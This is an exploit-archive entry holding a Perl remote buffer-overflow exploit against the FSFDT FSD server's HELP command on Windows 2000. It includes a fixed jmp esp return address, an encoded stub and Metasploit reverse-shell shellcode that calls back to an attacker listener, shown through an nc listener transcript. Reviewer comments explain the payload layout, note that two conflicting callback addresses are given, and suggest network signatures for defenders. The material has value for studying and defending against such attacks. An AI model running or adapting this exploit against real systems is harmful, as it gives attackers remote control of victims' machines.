FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow

EDB-ID:

4484


Author:

weak

Type:

remote


Platform:

Windows

Date:

2007-10-04


# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# 
# E:\draft\fsd1110\windows>_
# 
# -------------------------------------------

#!/usr/bin/perl

# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4

use IO::Socket;

# NOTE(review): the script runs without `use strict; use warnings;` -- the
# `my` declarations below are lexical, but nothing would catch a mistyped
# variable name or an undefined value being sent on the socket.

# Require both positional arguments (<ip> <port>). $#ARGV is the index of the
# last argument, so "< 1" means fewer than two were supplied.
if( $#ARGV < 1 )
{
	# The usage string has no trailing newline, and a bare exit() returns
	# status 0, so a caller cannot distinguish "usage error" from success.
	print "usage: perl ".$0." <ip> <port>";
	exit();
}
# Target host and port, taken verbatim from the command line (no validation).
my $ip = $ARGV[0];
my $port = $ARGV[1];

print "connecting...\n";
# Indirect-object syntax (`new Class (...)`); the conventional spelling is
# IO::Socket::INET->new(...). The constructor returns undef with $! set when
# the TCP connect fails, which the die below relies on.
my $sock = new IO::Socket::INET (  PeerAddr => $ip,  PeerPort => $port,  Proto => 'tcp',  );
die "could not create socket: $!\n" unless $sock;

# jmp esp in KERNEL32.DLL 5.0.2195.7006
# Four-byte little-endian absolute address. Because it is a fixed address in
# one specific KERNEL32.DLL build, the payload is only meaningful on a system
# with exactly that DLL image at that base; any other build, or a randomized
# image base, changes the outcome.
my $jmpesp = "\xB7\x49\xE7\x77";

# encoded 'jmp 0x400' to jump to stage2
# Per the author's comment this is a small encoded stub; its exact behaviour
# cannot be verified from this listing.
my $jmpcode = 
"\xeb\x11\x5e\x31\xc9\xb1\x1e\x80\x6c\x0e\xff\x35\x80\xe9\x01".
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x0e\x16\x0e\x69\x59\x8d".
"\x8d\x8d\x8d\xb5\x1d\x1c\x66\xfe\x9b\xb6\x1e\x30\x34\xb5\x65".
"\x36\x75\x17\x2f\x1d\x36\x3a\x36\x36";

# win32_reverse -  EXITFUNC=thread LHOST=10.0.0.2 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com
# bad chars: 0x00 0x0A 0x0D 0x20 0x29 
# NOTE(review): the generator line above says LHOST=10.0.0.2, while the header
# comment at the top of the file says the shell connects back to 10.0.0.100;
# both cannot be right. The address baked into the bytes is the one that
# matters and it cannot be confirmed from this listing. The bad-char list is
# presumably why an encoder was used: 0x0A/0x0D/0x20 would otherwise be read
# as line or token separators by a text-command parser.
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
"\x2a\x6e\x8f\x83\xeb\xfc\xe2\xf4\xe2\x40\x85\xc2\xf6\xd3\x91\x70".
"\xe1\x4a\xe5\xe3\x3a\x0e\xe5\xca\x22\xa1\x12\x8a\x66\x2b\x81\x04".
"\x51\x32\xe5\xd0\x3e\x2b\x85\xc6\x95\x1e\xe5\x8e\xf0\x1b\xae\x16".
"\xb2\xae\xae\xfb\x19\xeb\xa4\x82\x1f\xe8\x85\x7b\x25\x7e\x4a\xa7".
"\x6b\xcf\xe5\xd0\x3a\x2b\x85\xe9\x95\x26\x25\x04\x41\x36\x6f\x64".
"\x1d\x06\xe5\x06\x72\x0e\x72\xee\xdd\x1b\xb5\xeb\x95\x69\x5e\x04".
"\x5e\x26\xe5\xff\x02\x87\xe5\xcf\x16\x74\x06\x01\x50\x24\x82\xdf".
"\xe1\xfc\x08\xdc\x78\x42\x5d\xbd\x76\x5d\x1d\xbd\x41\x7e\x91\x5f".
"\x76\xe1\x83\x73\x25\x7a\x91\x59\x41\xa3\x8b\xe9\x9f\xc7\x66\x8d".
"\x4b\x40\x6c\x70\xce\x42\xb7\x86\xeb\x87\x39\x70\xc8\x79\x3d\xdc".
"\x4d\x69\x3d\xcc\x4d\xd5\xbe\xe7\x14\x2a\x6e\xeb\x78\x42\x7e\x6e".
"\x78\x79\xe7\x6e\x8b\x42\x82\x76\xb4\x4a\x39\x70\xc8\x40\x7e\xde".
"\x4b\xd5\xbe\xe9\x74\x4e\x08\xe7\x7d\x47\x04\xdf\x47\x03\xa2\x06".
"\xf9\x40\x2a\x06\xfc\x1b\xae\x7c\xb4\xbf\xe7\x72\xe0\x68\x43\x71".
"\x5c\x06\xe3\xf5\x26\x81\xc5\x24\x76\x58\x90\x3c\x08\xd5\x1b\xa7".
"\xe1\xfc\x35\xd8\x4c\x7b\x3f\xde\x74\x2b\x3f\xde\x4b\x7b\x91\x5f".
"\x76\x87\xb7\x8a\xd0\x79\x91\x59\x74\xd5\x91\xb8\xe1\xfa\x06\x68".
"\x67\xec\x17\x70\x6b\x2e\x91\x59\xe1\x5d\x92\x70\xce\x42\x81\x41".
"\xfe\x4a\x3d\x70\xc8\xd5\xbe\x8f";

print "sending payload...\n";
# One write, concatenated in this order:
#   "HELP "        the command the vulnerable handler parses
#   "A" x 200      filler; per the jmp-esp comment above, presumably the
#                  distance to the saved return address
#   $jmpesp        the fixed KERNEL32 address
#   "\x90" x 8     short NOP pad
#   $jmpcode       the encoded stub
#   "\n"           presumably the line terminator of the HELP command
#   "\x90" x 400   NOP sled
#   $shellcode     stage 2
# For defenders: a HELP argument of several hundred bytes dominated by 0x41
# and 0x90 is a straightforward network signature, and bounding the HELP
# argument buffer (or rejecting oversized command lines before they are
# copied) removes the overflow. The return value of print is not checked,
# so a short or failed write is silently ignored.
print $sock "HELP " . "A"x200 . $jmpesp . "\x90"x8 . $jmpcode . "\n" . "\x90"x400 . $shellcode;
# close() is unchecked as well; any buffered write error is lost here.
close($sock);

# Printed unconditionally, even when the send above failed.
print "done.\n";

# milw0rm.com [2007-10-04]